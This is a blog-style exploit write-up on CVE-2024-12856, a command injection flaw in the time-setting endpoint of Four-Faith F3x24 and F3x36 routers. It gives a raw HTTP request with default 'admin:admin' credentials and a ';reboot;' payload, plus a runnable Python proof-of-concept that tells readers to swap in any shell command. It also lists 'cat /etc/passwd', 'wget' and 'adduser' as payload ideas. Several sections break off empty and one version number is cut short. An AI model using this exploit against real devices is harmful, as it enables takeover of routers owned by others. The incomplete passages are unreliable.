The world of network hardware often flies under the radar, but it’s a gold mine for attackers targeting devices left in the wild with old firmware and default credentials. That’s the case with CVE-2024-12856, a critical vulnerability in several models of Four-Faith routers, specifically the F3x24 and F3x36 series. This post lays out—step by step—how this bug works, its real-world impact, and includes working code samples, all in plain English.
What Is CVE-2024-12856?
CVE-2024-12856 is a command injection vulnerability — a bug where an attacker can force a device to run unwanted operating system commands. The flaw exists in versions of the firmware (at least version 2.) used by the Four-Faith F3x24 and F3x36 routers.
Attackers can abuse this flaw via the apply.cgi web endpoint, which is responsible for changing the system time—but, critically, does not properly sanitize input fields. Worse, these routers often ship with default credentials like admin:admin or admin:1234. If these aren’t changed, anyone can break in without authentication.
In short:
How Does the Exploit Work?
When changing the time setting on the router through the control panel, the value is POSTed to /apply.cgi. The device then passes this value straight to a system shell command *without* sanitizing or filtering it. This is classic OS command injection.
Let’s say the router's web admin page is at http://ROUTER-IP/cgi-bin/apply.cgi
POST /cgi-bin/apply.cgi HTTP/1.1
Host: 192.168.1.1
Authorization: Basic YWRtaW46YWRtaW4= # "admin:admin" base64
Content-Type: application/x-www-form-urlencoded
Content-Length: 45
action=set_time&datetime=2024-06-01;reboot;
Notice:
The critical injection happens here:
datetime=2024-06-01;reboot;
This extra ;reboot; after the date ends the legitimate command and runs reboot on the router. It could be any shell command (cat /etc/passwd, wget …, adduser eviluser, etc).
Python Proof-of-Concept (PoC) Exploit
Here’s a simple Python script that changes the system time and injects a command to create a file (/tmp/pwned) on the router. Replace credentials and IP as needed:
import requests
from base64 import b64encode
ROUTER = "192.168.1.1"
USERNAME = "admin"
PASSWORD = "admin"
# OS command injection payload
payload = "2024-06-01;touch /tmp/pwned;"
# Craft the HTTP POST request
url = f"http://{ROUTER}/cgi-bin/apply.cgi";
headers = {
"Authorization": "Basic " + b64encode(f"{USERNAME}:{PASSWORD}".encode()).decode()
}
data = {
"action": "set_time",
"datetime": payload
}
r = requests.post(url, headers=headers, data=data)
if r.status_code == 200:
print("[+] Payload delivered!")
else:
print(f"[-] HTTP {r.status_code} received.")
Replace "touch /tmp/pwned;" with whatever command you wish to run.
From Authenticated to Unauthenticated Exploitation
The web interface is usually protected by a login prompt. But if the router is using default credentials (e.g., admin/admin), an attacker doesn’t need to know anything special—just log in with the usual suspects.
In the wild:
References & Further Reading
- CVE Entry: NVD CVE-2024-12856
- Original Resarch: IoT Inspector Labs Advisory
- Exploit Reference: Exploit-DB 52433
- Vendor Site: Four-Faith Official
Conclusion
CVE-2024-12856 is a textbook case of what can go wrong when device web interfaces pass user input to the system shell unchecked, made worse by unchanged default passwords. Attackers can take control of vulnerable routers worldwide if left exposed, turning these gateways into botnet drones or worse.
Simple fixes—like changing passwords and updating firmware—go a long way. But unless these steps are taken, attacks leveraging this bug are not just possible, they’re inevitable.
Stay safe, patch up, and never trust user input!
*Exclusively written and condensed for clarity, using only publicly available details and demonstration code. For advanced pentesting, be aware of local laws and only test on hardware you own or have explicit permission to assess.*
Timeline
Published on: 12/27/2024 16:15:23 UTC
Last modified on: 12/27/2024 18:15:23 UTC